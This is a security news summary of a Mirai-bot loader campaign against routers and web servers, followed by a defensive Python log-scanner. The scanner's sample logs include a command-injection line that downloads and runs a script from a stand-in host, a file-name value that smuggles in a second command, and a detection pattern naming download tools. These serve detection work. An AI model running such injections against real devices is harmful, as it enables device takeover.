Network Security, Malware

Mirai bots deployed by novel botnet loader-as-a-service


GBHackers News reports that Oracle WebLogic servers, small office/home office (SOHO) routers, Linux devices, and CMS platforms have been targeted over the past six months by a novel botnet loader-as-a-service campaign distributing Mirai-like bots, with attack volume increasing by 230% from July to August.

Unsanitized POST parameters and default credentials have been leveraged alongside known WebLogic, WordPress, and vBulletin vulnerabilities to achieve remote code execution, according to findings from CloudSEK's TRIAD team.

The observed activity follows a consistent sequence: login attempts are made through the ReplyPageLogin handler, command injection is then delivered via the ConfigSystemCommand and SystemCommand parameters, and ReplyDeviceInfo requests are used for post-exploitation reconnaissance of the compromised device.

Organizations have been advised to counter the threat by restricting egress from affected devices, rotating default credentials and applying current firmware, deploying Sigma rules that flag suspicious POST parameters, segmenting internet of things and embedded devices from the rest of the network, hardening web management interfaces, preserving forensic artifacts from suspected compromises, and replacing devices that have reached end-of-life.
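As an added illustration of the "suspicious POST parameters" detection advice above (example code written for this summary, not from CloudSEK, GBHackers, or the campaign itself), the following Python script scans constructed access-log lines for the parameter names the report mentions and for generic shell-injection patterns in their values. The one-line log format, the sample IP addresses, and the injection heuristic are assumptions made for the demonstration, not details from the report.

```python
import re
from urllib.parse import parse_qs

# Parameter names called out in the campaign report.
SUSPICIOUS_PARAMS = {
    "ReplyPageLogin",
    "ConfigSystemCommand",
    "SystemCommand",
    "ReplyDeviceInfo",
}

# Generic shell-injection heuristic (assumption: these are common loader
# patterns, not the campaign's exact payloads): shell separators, command
# substitution, and typical download/stage binaries.
INJECTION_RE = re.compile(
    r"(;|\|\||&&|`|\$\(|\b(wget|curl|tftp|chmod|busybox)\b)", re.I
)

# Constructed log format for this example: "<ip> <method> <path> <urlencoded body>"
LOG_RE = re.compile(r"^(?P<ip>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<body>.*)$")


def analyze_line(line):
    """Return a list of findings for one log line; empty when nothing is flagged.

    Only POST requests are inspected, since the report ties the activity to
    POST parameters. A finding is raised when a parameter name matches the
    reported set, or when any decoded value contains an injection pattern.
    """
    m = LOG_RE.match(line.strip())
    if not m or m.group("method") != "POST":
        return []
    params = parse_qs(m.group("body"), keep_blank_values=True)
    findings = []
    for name, values in params.items():
        known = name in SUSPICIOUS_PARAMS
        injected = any(INJECTION_RE.search(v) for v in values)
        if known or injected:
            findings.append({
                "ip": m.group("ip"),
                "path": m.group("path"),
                "param": name,
                "known_param": known,
                "injection_pattern": injected,
                "values": values,
            })
    return findings


def analyze_log(lines):
    """Run analyze_line over an iterable of log lines and flatten the findings."""
    return [f for line in lines for f in analyze_line(line)]


def suspicious_sources(lines):
    """Source IPs with at least one finding, usable as a block-list candidate set."""
    return {f["ip"] for f in analyze_log(lines)}


# Constructed sample log lines (RFC 5737 documentation addresses, not real traffic).
SAMPLE_LOG = [
    "203.0.113.7 POST /cgi-bin/login.cgi ReplyPageLogin=1&username=admin&password=admin",
    "203.0.113.7 POST /cgi-bin/setup.cgi ConfigSystemCommand=%3Bwget%20http%3A%2F%2F198.51.100.9%2Fbot.sh%20-O%20%2Ftmp%2Fb%3Bsh%20%2Ftmp%2Fb",
    "198.51.100.22 POST /api/status ReplyDeviceInfo=1",
    "192.0.2.5 POST /contact name=alice&message=hello+world",
    "192.0.2.5 GET /index.html -",
    "192.0.2.8 POST /upload file=a.txt%3B%20id",
]

if __name__ == "__main__":
    for finding in analyze_log(SAMPLE_LOG):
        print(finding)
    print("block candidates:", sorted(suspicious_sources(SAMPLE_LOG)))
```

The second sample line shows why both checks matter: the parameter name alone would already trigger, but the decoded value (a `wget` download chained with `;`) is what distinguishes an active loader from a benign probe, so a SIEM rule built on this logic should surface both fields for the analyst.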
